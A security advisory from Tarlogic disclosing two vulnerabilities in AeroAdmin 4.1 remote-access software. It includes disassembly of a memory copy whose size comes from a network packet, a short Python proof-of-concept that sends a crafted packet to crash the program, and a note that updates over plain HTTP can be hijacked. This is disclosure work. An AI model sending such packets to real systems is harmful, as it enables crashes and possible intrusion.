Tarlogic Advisory: Tarlogic-2017-001
Title: Multiple vulnerabilities found in AeroAdmin 4.1 software.
Discovered by: Juan Manuel Fernandez (@TheXC3LL)
CWE-ID: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
AeroAdmin Vulnerability – CVE-2017-889
Advisory.vulnerabilities reported by Tarlogic
AeroAdmin 4.1 uses a function to copy data between two pointers where the size of the data copied is taken directly from a network packet. This vulnerability have been reported as CVE-2017-8893.
005301B0 push edi
005301B1 push esi
005301B2 mov esi, ORIGEN
005301B6 mov ecx, SIZE
005301BA mov edi, DESTINO
005301BE mov eax, ecx
005301C0 mov edx, ecx
005301C2 add eax, esi
005301C4 cmp edi, esi
005301C6 jbe short loc_005
005301FE rep movsb ; Crash
00530200 mov eax, [esp+8+DESTINO]
00530204 pop esi
00530205 pop edi
We can control “SIZE” variable, so the ECX register used for “rep movsb” has an arbitrary value at this point. Set a breakpoint at rep mosvb address and test it:
#Proof of concept
target_IP =’192.168.245.206′ #Change as needed
target_port = 5950
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (target_IP, target_port)
packet1 = “040000000037130000”.decode(“hex”) # <– will be the value used as size (3713 –> 1337)
print “[+] Sent:\n ” + packet1.encode(“hex”)
ECX 00133700 <– Number of bytes that are going to be copied
Aeroadmin 4.1 CVE-2017-8894
AeroAdmin 4.1 uses an insecure protocol (HTTP) to perform software updates.
An attacker can hijack an update via man-in-the-middle in order to execute code in the machine.
Discover our work and cybersecurity services.